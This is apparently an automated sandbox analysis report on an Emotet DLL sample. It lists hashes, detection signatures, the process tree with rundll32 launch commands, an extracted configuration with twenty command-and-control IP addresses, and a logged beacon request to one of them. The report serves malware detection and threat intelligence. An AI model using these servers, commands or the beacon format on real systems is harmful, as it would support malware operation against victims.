Loading ...

Play interactive tourEdit tour

Windows Analysis Report MakbLShaqA.dll

Overview

General Information

Sample Name:MakbLShaqA.dll
Analysis ID:528565
MD5:d8f093871cd90d160aa42b945f68e229
SHA1:bed9b13fc1caeab0d9ee69c7ee9a3fc7939c04d5
SHA256:778db11e074622c21181ac26eaead6bb1c8e60d4aee8b7df810ffffbd03b2064
Tags:32dllexe
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Emotet RunDLL32 Process Creation
Multi AV Scanner detection for domain / URL
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5912 cmdline: loaddll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 5680 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 1488 cmdline: rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 5064 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 576 cmdline: rundll32.exe C:\Users\user\Desktop\MakbLShaqA.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 4624 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Sxdbowjvh\qaursesh.cky",UWJouFROYqkt MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 4396 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Sxdbowjvh\qaursesh.cky",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 3056 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3444 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4620 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6092 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4144 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 1260 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 2436 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 244 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6508 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6680 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1884 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.644665975.0000000004820000.00000040.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000007.00000002.642932572.0000000002730000.00000040.00000010.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000007.00000002.645532661.0000000004CA0000.00000040.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000002.00000002.251093887.0000000005030000.00000040.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000007.00000002.645241270.0000000004BC0000.00000040.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 12 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.rundll32.exe.4eb0000.16.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              2.2.rundll32.exe.4bc0000.4.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                7.2.rundll32.exe.4bc0000.10.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  7.2.rundll32.exe.4900000.6.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    7.2.rundll32.exe.4eb0000.16.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 29 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Emotet RunDLL32 Process CreationShow sources
                      Source: Process startedAuthor: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Sxdbowjvh\qaursesh.cky",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Sxdbowjvh\qaursesh.cky",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Sxdbowjvh\qaursesh.cky",UWJouFROYqkt, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 4624, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Sxdbowjvh\qaursesh.cky",Control_RunDLL, ProcessId: 4396

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 7.2.rundll32.exe.2730000.0.raw.unpackMalware Configuration Extractor: Emotet {"Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: MakbLShaqA.dllVirustotal: Detection: 16%Perma Link
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: https://51.178.61.60/Virustotal: Detection: 9%Perma Link
                      Machine Learning detection for sampleShow sources
                      Source: MakbLShaqA.dllJoe Sandbox ML: detected
                      Source: MakbLShaqA.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.5:49759 version: TLS 1.2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_100331CA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04201A80 FindFirstFileW,

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.4:49764 -> 51.178.61.60:443
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 51.178.61.60 187
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 51.178.61.60:443
                      Source: Malware configuration extractorIPs: 168.197.250.14:80
                      Source: Malware configuration extractorIPs: 45.79.33.48:8080
                      Source: Malware configuration extractorIPs: 196.44.98.190:8080
                      Source: Malware configuration extractorIPs: 177.72.80.14:7080
                      Source: Malware configuration extractorIPs: 51.210.242.234:8080
                      Source: Malware configuration extractorIPs: 185.148.169.10:8080
                      Source: Malware configuration extractorIPs: 142.4.219.173:8080
                      Source: Malware configuration extractorIPs: 78.47.204.80:443
                      Source: Malware configuration extractorIPs: 78.46.73.125:443
                      Source: Malware configuration extractorIPs: 37.44.244.177:8080
                      Source: Malware configuration extractorIPs: 37.59.209.141:8080
                      Source: Malware configuration extractorIPs: 191.252.103.16:80
                      Source: Malware configuration extractorIPs: 54.38.242.185:443
                      Source: Malware configuration extractorIPs: 85.214.67.203:8080
                      Source: Malware configuration extractorIPs: 54.37.228.122:443
                      Source: Malware configuration extractorIPs: 207.148.81.119:8080
                      Source: Malware configuration extractorIPs: 195.77.239.39:8080
                      Source: Malware configuration extractorIPs: 66.42.57.149:443
                      Source: Malware configuration extractorIPs: 195.154.146.35:443
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: Joe Sandbox ViewASN Name: EcobandGH EcobandGH
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: GET /mORDXFCTowJiEI HTTP/1.1Cookie: komdJdlT=TUmhOHjsq0jpdGYwwvuYW84t0VBz8jE3ieyufpTPSdsSjuFT9qN1vMRROT8XX34gAF8S6dpwUc+oH5xz0lXr75zGC35p3jlBRFBy5IujQdhnOqTtUqxCGNYrbZrmR2afdnZt5Wh/ofDgB2jcFQw6+VQQ2JIP7HCr+Pn9kzeVvkTqaBMsd4PXWCuDfSYazrGRqNltBGE0OeF7XD2oZRFmR54nZGCBwDANUxBVGwEA6yHtFefhr4En4Q==Host: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 207.148.81.119 207.148.81.119
                      Source: Joe Sandbox ViewIP Address: 196.44.98.190 196.44.98.190
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: svchost.exe, 00000019.00000003.372781652.000002854CB83000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.facebook.com (Facebook)
                      Source: svchost.exe, 00000019.00000003.372781652.000002854CB83000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.twitter.com (Twitter)
                      Source: svchost.exe, 00000019.00000003.372781652.000002854CB83000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.372851993.000002854CB94000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-23T19:02:05.3195648Z||.||797d024d-8c74-4faa-b6a6-08435801478b||1152921505694213184||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                      Source: svchost.exe, 00000019.00000003.372781652.000002854CB83000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.372851993.000002854CB94000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-23T19:02:05.3195648Z||.||797d024d-8c74-4faa-b6a6-08435801478b||1152921505694213184||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                      Source: rundll32.exe, rundll32.exe, 00000002.00000002.251213292.0000000010056000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.248351593.0000000010056000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.252910239.0000000010056000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.646110148.0000000010056000.00000002.00020000.sdmp, MakbLShaqA.dllString found in binary or memory: http://www.yahoo.com equals www.yahoo.com (Yahoo)
                      Source: rundll32.exe, 00000007.00000002.643498078.000000000299A000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.269041596.000000000299A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.539104380.00000275BC28C000.00000004.00000001.sdmp, svchost.exe, 00000019.00000002.388838675.000002854CB00000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 0000000A.00000002.538995107.00000275BC212000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 00000019.00000003.368117861.000002854CB77000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.368199872.000002854D002000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.368168723.000002854CB98000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 00000019.00000002.388541947.000002854C23C000.00000004.00000001.sdmpString found in binary or memory: http://schemas.microft8
                      Source: svchost.exe, 0000000E.00000002.305947613.000002890D413000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: rundll32.exe, rundll32.exe, 00000002.00000002.251213292.0000000010056000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.248351593.0000000010056000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.252910239.0000000010056000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.646110148.0000000010056000.00000002.00020000.sdmp, MakbLShaqA.dllString found in binary or memory: http://www.yahoo.com
                      Source: svchost.exe, 0000000C.00000002.642318002.000001E5D943E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 0000000C.00000002.642318002.000001E5D943E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: rundll32.exe, 00000007.00000002.643460255.0000000002979000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.269137604.0000000002977000.00000004.00000001.sdmpString found in binary or memory: https://51.178.61.60/
                      Source: rundll32.exe, 00000007.00000002.643460255.0000000002979000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.643350637.0000000002941000.00000004.00000020.sdmp, rundll32.exe, 00000007.00000003.269137604.0000000002977000.00000004.00000001.sdmpString found in binary or memory: https://51.178.61.60/mORDXFCTowJiEI
                      Source: rundll32.exe, 00000007.00000002.643350637.0000000002941000.00000004.00000020.sdmpString found in binary or memory: https://51.178.61.60/mORDXFCTowJiEI7L
                      Source: rundll32.exe, 00000007.00000002.643350637.0000000002941000.00000004.00000020.sdmpString found in binary or memory: https://51.178.61.60/mORDXFCTowJiEIIL
                      Source: svchost.exe, 0000000C.00000002.642318002.000001E5D943E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 0000000C.00000002.642318002.000001E5D943E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.comt
                      Source: svchost.exe, 0000000E.00000003.305618783.000002890D461000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 0000000C.00000002.642318002.000001E5D943E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000C.00000002.642318002.000001E5D943E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000E.00000002.305963685.000002890D42A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.305624378.000002890D45F000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000E.00000003.305631055.000002890D45A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.306018853.000002890D45B000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000E.00000003.305618783.000002890D461000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 0000000E.00000002.305987582.000002890D43E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 0000000E.00000003.305631055.000002890D45A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.306018853.000002890D45B000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000E.00000003.305618783.000002890D461000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000E.00000002.306010313.000002890D44E000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.305602622.000002890D449000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000E.00000002.305963685.000002890D42A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000E.00000003.305631055.000002890D45A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.306018853.000002890D45B000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000E.00000003.305618783.000002890D461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 0000000E.00000002.305987582.000002890D43E000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
